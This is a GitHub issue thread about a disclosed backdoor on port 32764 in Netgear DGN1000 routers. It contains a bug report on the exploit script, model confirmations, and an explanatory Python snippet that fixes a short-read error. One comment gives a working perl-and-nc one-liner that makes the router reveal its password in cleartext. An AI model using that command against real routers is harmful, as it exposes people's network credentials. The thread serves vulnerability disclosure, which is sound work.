DGN1000 #3

Closed
grigio opened this Issue Jan 2, 2014 · 6 comments

grigio commented Jan 2, 2014

Your script returns:

Traceback (most recent call last):
  File "backdoorolol.py", line 23, in <module>
    print send_message(s, 2, "http_password")[1]
  File "backdoorolol.py", line 11, in send_message
    sig, ret_val, ret_len = struct.unpack('<III', s.recv(0xC))
struct.error: unpack requires a string argument of length 12

Anyway, with the DGN1000 Netgear N150 and the script below, I'm able to see the password in cleartext.

perl -e 'print pack("(III)<", 0x53634d4d, 0x01, 0x00)' \
| nc 192.168.1.1 32764

I also tried over the internet (with or without remote administration enabled) and it doesn't work, so it seems to be just a local LAN exploit.

Owner

elvanderb commented Jan 2, 2014

I should have added a little loop and checked the length of the returned string :)
I'll update the script. Thank you for reporting the issue.
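The traceback above comes from unpacking a 12-byte header straight out of a single `recv(0xC)`: a stream socket may hand back fewer bytes than asked for, and `struct.unpack('<III', ...)` then fails. The following is an added example (not elvanderb's script) that reproduces the short read against a constructed, fragmented 12-byte header and shows the loop-until-complete fix the reply describes; only the header layout is taken from the traceback, the sample field values are made up.

```python
import socket
import struct
import threading

HEADER_FMT = "<III"  # sig, ret_val, ret_len: the layout unpacked in the traceback
HEADER_LEN = struct.calcsize(HEADER_FMT)  # 12 bytes (0xC)

def recv_exact(sock, n):
    """Read exactly n bytes, looping because one recv(n) may return fewer."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:  # peer closed early: say so instead of a confusing struct.error
            raise EOFError(f"peer closed after {len(buf)} of {n} bytes")
        buf += chunk
    return bytes(buf)

def parse_header_naive(sock):
    """The pattern from the traceback: one recv() then unpack; fails on a short read."""
    return struct.unpack(HEADER_FMT, sock.recv(HEADER_LEN))

def parse_header_robust(sock):
    """Fixed pattern: accumulate the full header before unpacking."""
    return struct.unpack(HEADER_FMT, recv_exact(sock, HEADER_LEN))

def demo(parser, split_at=5):
    """Feed `parser` a constructed header that arrives in two segments.
    Returns the unpacked tuple, or "struct.error" if parsing failed."""
    a, b = socket.socketpair()
    header = struct.pack(HEADER_FMT, 0x53634D4D, 0, 4)  # constructed sample values
    b.sendall(header[:split_at])  # first segment is already buffered for `a`

    def send_rest():  # the remaining bytes show up a little later
        b.sendall(header[split_at:])
        b.close()

    t = threading.Timer(0.05, send_rest)
    t.start()
    try:
        return parser(a)
    except struct.error:
        return "struct.error"
    finally:
        t.join()
        a.close()
```

`demo(parse_header_naive)` reproduces the failure from the report, while `demo(parse_header_robust)` returns the three header fields.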

@elvanderb elvanderb closed this Jan 2, 2014

teetaucher commented Jan 2, 2014

I'm not sure if there is any difference to the device reported above, but the backdoor is also present in the "Netgear N150 DGN1000B".

By the way: Nice Work! Perhaps could you give some more information about the tools you used?

Owner

elvanderb commented Jan 2, 2014

Thank you, I updated the README :)
I just used nmap, Google, binwalk, IDA and a patched version of squashfs tools :)

grigio commented Jan 3, 2014

@elvanderb I forgot to ask, do you recommend any other alternative firmwares without this exploit? I tried to look at pfSense and OpenWrt and it seems this router isn't supported.

Owner

elvanderb commented Jan 3, 2014

No, sorry :)

teetaucher commented Jan 3, 2014

Update: The DGN1000B is the firmware for countries which use Annex B (e.g. Germany) for DSL.
